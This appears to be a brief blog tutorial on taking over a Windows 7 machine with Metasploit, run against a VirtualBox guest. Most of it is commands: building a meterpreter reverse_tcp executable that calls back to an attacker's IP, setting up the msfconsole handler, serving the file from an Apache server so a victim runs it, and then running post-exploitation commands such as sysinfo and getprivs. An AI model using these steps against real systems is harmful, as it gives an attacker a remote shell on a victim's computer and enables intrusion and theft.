Hacking Windows 7 using Metasploit
CYBERATOR
Step 1:
Boot Windows 7 in virtual Box:
Step 2:
Start a new Terminal and type the following command:
msfpayload windows/meterpreter/reverse_tcp lhost=<attacker's IP> lport=4444 x>exploit.exe
Step 3:
Start a new terminal and type "msfconsole". Now type following commands:
use exploit/multi/handler
set lhost <Attacker's IP>
set lport 4444
set payload windows/meterpreter/reverse_tcp
exploit
Step 4:
Open up windows 7 machine and run the exploit.exe which we created.
You can make your exploit accessible over the network using Apache server
Step 5:
Run the exploit...we will get a meterpreter session opened.
Type following commands:
sysinfo
getprivs....etc
1337
ReplyDelete